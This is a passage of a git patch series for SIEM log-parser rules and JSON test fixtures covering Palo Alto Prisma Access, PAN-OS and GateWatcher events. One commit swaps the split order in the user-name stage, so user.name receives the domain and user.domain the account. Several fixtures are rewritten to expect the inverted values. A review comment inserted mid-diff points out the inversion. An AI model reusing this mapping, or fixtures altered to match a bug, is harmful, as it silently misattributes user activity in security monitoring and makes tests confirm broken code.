@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", 
+ "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:14:17 +0100 Subject: [PATCH 55/84] fix(GateWatcher): lint taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:28:16 +0100 Subject: [PATCH 56/84] test(GateWatcher): Improve support of tls events --- GateWatcher/aioniq/ingest/parser.yml | 1 + GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..869a7f8f3 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -215,3 +215,4 @@ stages: gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json 
@@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", 
+ "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:33:23 +0100 Subject: [PATCH 57/84] fix(GateWatcher): lint parser --- GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 869a7f8f3..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
@@ -206,13 +206,13 @@ stages:
 tls:
 actions:
 - set:
- tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
- tls.server.not_before: "{{json_load.message.tls.notbefore}}"
- tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
- tls.server.subject: "{{json_load.message.tls.subject}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
- gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
- gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
- tls.version: "{{json_load.message.tls.version}}"
- tls.server.not_after: "{{json_load.message.tls.notafter}}"
- tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls: "{{json_load.message.tls}}"
+ gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:45:07 +0100
Subject: [PATCH 58/84] chore(PAloaAlto): name some columns
---
 .../paloalto-prisma-access/ingest/parser.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 113ef7fdb..7c7de00b8 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -142,7 +142,7 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USER
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -235,12 +235,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:46:41 +0100
Subject: [PATCH 59/84] fix(PaloAlto): fix the definition of the user properties
---
 .../paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/decryption_cef.json | 5 +++--
 .../paloalto-prisma-access/tests/fix_bug_with_int.json | 5 +++--
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 5 +++--
 .../paloalto-prisma-access/tests/test_globalprotect.json | 7 ++++---
 .../paloalto-prisma-access/tests/test_userid.json | 6 +++---
 6 files changed, 18 insertions(+), 14 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 7c7de00b8..84514974e 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -798,8 +798,8 @@ stages:
 set_finalize_user_name:
 actions:
 - set:
- user.domain: '{{final.user.name.split("\\") | first}}'
- user.name: '{{final.user.name.split("\\") | last}}'
+ user.domain: '{{final.user.name.split("\\") | last}}'
+ user.name: '{{final.user.name.split("\\") | first}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
 user.domain: '{{final.user.email.split("@") | first}}'
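Review bot: Swapping `first`/`last` in `set_finalize_user_name` makes `user.name` receive the part before the backslash and `user.domain` the part after, which is backwards for the `DOMAIN\user` form the updated fixtures appear to hold (`test_globalprotect.json` now expects `"domain": "JDOE"`, `"name": "test.fr"`, and `test_userid.json` drops `JDOE` from `related.user` altogether). If the source really emits `domain\user`, the original two lines were correct and should be restored, with the fixture changes reverted. The unchanged context line `user.domain: '{{final.user.email.split("@") | first}}'` has the same inversion for the e-mail branch; the hipmatch fixture added in the next commit shows it as `"domain": "jdoe"`, `"name": "example.org"`. Because detection content and entity correlation key on `user.name`, an inverted mapping silently attributes activity to the domain string instead of the account. The `set_finalize_user_name` stage continues outside the hunk.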
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
index 1a4fba4b4..b32ea4d13 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
@@ -69,6 +69,7 @@
 "1.1.1.1"
 ],
 "user": [
+ "paloaltonetwork",
 "xxxxx"
 ]
 },
@@ -90,8 +91,8 @@
 }
 },
 "user": {
- "domain": "paloaltonetwork",
- "name": "xxxxx"
+ "domain": "xxxxx",
+ "name": "paloaltonetwork"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
index 512ae89e7..37c8000b9 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
@@ -62,6 +62,7 @@
 "5.6.7.8"
 ],
 "user": [
+ "domain",
 "pusername",
 "userdest"
 ]
@@ -86,8 +87,8 @@
 }
 },
 "user": {
- "domain": "domain",
- "name": "pusername"
+ "domain": "pusername",
+ "name": "domain"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e4b1d5fab..e0cb016eb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
@@ -46,6 +46,7 @@
 "88.120.236.74"
 ],
 "user": [
+ "example.org",
 "test"
 ]
 },
@@ -61,8 +62,8 @@
 }
 },
 "user": {
- "domain": "example.org",
- "name": "test"
+ "domain": "test",
+ "name": "example.org"
 },
 "user_agent": {
 "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index f08a677ef..5cc8690a2 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
@@ -49,7 +49,8 @@
 "1.2.3.4"
 ],
 "user": [
- "JDOE"
+ "JDOE",
+ "test.fr"
 ]
 },
 "source": {
@@ -64,8 +65,8 @@
 }
 },
 "user": {
- "domain": "test.fr",
- "name": "JDOE"
+ "domain": "JDOE",
+ "name": "test.fr"
 },
 "user_agent": {
 "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
index dee27d0e1..48cbcdca5 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
@@ -44,7 +44,7 @@
 "1.2.3.4"
 ],
 "user": [
- "JDOE"
+ "test.fr"
 ]
 },
 "source": {
@@ -53,8 +53,8 @@
 "port": 0
 },
 "user": {
- "domain": "test.fr",
- "name": "JDOE"
+ "domain": "JDOE",
+ "name": "test.fr"
 }
 }
 }
\ No newline at end of file
From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:47:10 +0100
Subject: [PATCH 60/84] test(PaloAlto): add test for hipmatch event in json representation
---
 .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json
new file mode 100644
index 000000000..45f8d34f8
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:48:59 +0100
Subject: [PATCH 61/84] fix(PaloAlto): extract host id and rule name for HIPMatch
---
 Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/globalprotect_csv.json | 1 +
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 1 +
 .../paloalto-prisma-access/tests/test_globalprotect.json | 1 +
 .../paloalto-prisma-access/tests/test_hipmatch_json.json | 4 ++++
 .../paloalto-prisma-access/tests/test_new_globalprotect.json | 1 +
 6 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 84514974e..07492992b 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -577,7 +577,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -602,7 +602,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e0cb016eb..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index 5cc8690a2..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json 
@@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json index 45f8d34f8..fd4e5a75f 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:51:21 +0100 Subject: [PATCH 62/84] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-prisma-access/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 07492992b..63f72e8e0 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - 